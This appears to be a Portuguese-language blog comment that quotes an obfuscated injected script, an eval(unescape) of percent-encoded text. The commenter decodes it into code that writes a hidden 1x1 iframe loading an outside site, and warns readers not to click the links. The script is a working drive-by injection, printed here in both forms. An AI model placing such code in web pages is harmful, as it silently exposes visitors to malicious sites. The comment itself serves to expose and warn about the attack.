    <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%35%35%33%34%33%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

    descriptografando fica assim:

    <script>eval(unescape('document.write('<iframe src="http://podfer.com/?555343" width=1 height=1></iframe>')'));</script>

    como ja foi dito: NÃO CLIQUEM NOS LINKS ^^

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »